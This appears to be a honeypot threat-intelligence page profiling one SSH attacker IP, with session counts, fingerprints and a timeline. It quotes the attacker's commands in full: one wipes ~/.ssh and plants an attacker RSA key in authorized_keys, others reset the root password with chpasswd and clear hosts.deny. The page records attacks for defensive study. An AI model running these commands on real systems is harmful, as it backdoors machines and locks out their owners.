← Back to feed
Location
🇬🇧 GB / London
ASN
AS42831 · UK Dedicated Servers Limited
Cloud Provider
—
Total Events
421
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-23 02:07 — 2026-04-23 04:43
Attack Types
MITRE ATT&CK Techniques
Initial Access
Defense Evasion
Command and Control
External Corroboration
Not flagged by any external feeds
Session Forensics
Sessions
48 (20 with login)
Avg Depth Score
0.42
Commands Executed
49
Files Downloaded
12
Notable Commands
- cd ~; chattr -ia .ssh; lockr -ia .ssh
- lockr -ia .ssh
- cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
- cat /proc/cpuinfo | grep name | wc -l
- echo "root:BupTQh0yi5Ne"|chpasswd|bash
- rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
- cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
- echo "root:JMwcDnwV7Xgt"|chpasswd|bash
- free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
- ls -lh $(which ls)
- which ls
Fingerprints
HASSH
SSH Client
Evidence Timeline
Malware Dropper
dd201a6ac5d4
LOGIN
3
1
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
dbdf18bec1d5
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Malware Dropper
d315c353384c
LOGIN
7
2
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:BupTQh0yi5Ne"|chpasswd|bash
Opportunistic Bruter
a20aad1666de
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Malware Dropper
7d761ab479df
LOGIN
3
1
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
f2f49098602d
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Malware Dropper
6c6f9b586dae
LOGIN
3
1
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Malware Dropper
ccaa54a723f9
LOGIN
3
1
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
72e89fb5fbe6
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Opportunistic Bruter
f30debb5fc2d
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Malware Dropper
a0acc95b6276
LOGIN
3
1
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
afcf5b13756d
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Malware Dropper
0abd25ac3d74
LOGIN
1
1
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
e5cfe171139b
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Opportunistic Bruter
31fa83cb0a24
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Malware Dropper
8dc720774027
LOGIN
20
2
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:JMwcDnwV7Xgt"|chpasswd|bash
Opportunistic Bruter
f9830fea6ac2
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Malware Dropper
da2dd40bd863
LOGIN
3
1
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Opportunistic Bruter
5168379a0085
LOGIN
1
50%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
Malware Dropper
6752b9848189
LOGIN
3
1
1
100%
Loading events...
HASSH af8223ac9914f50…
SSH-2.0-libssh_0.12.0
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…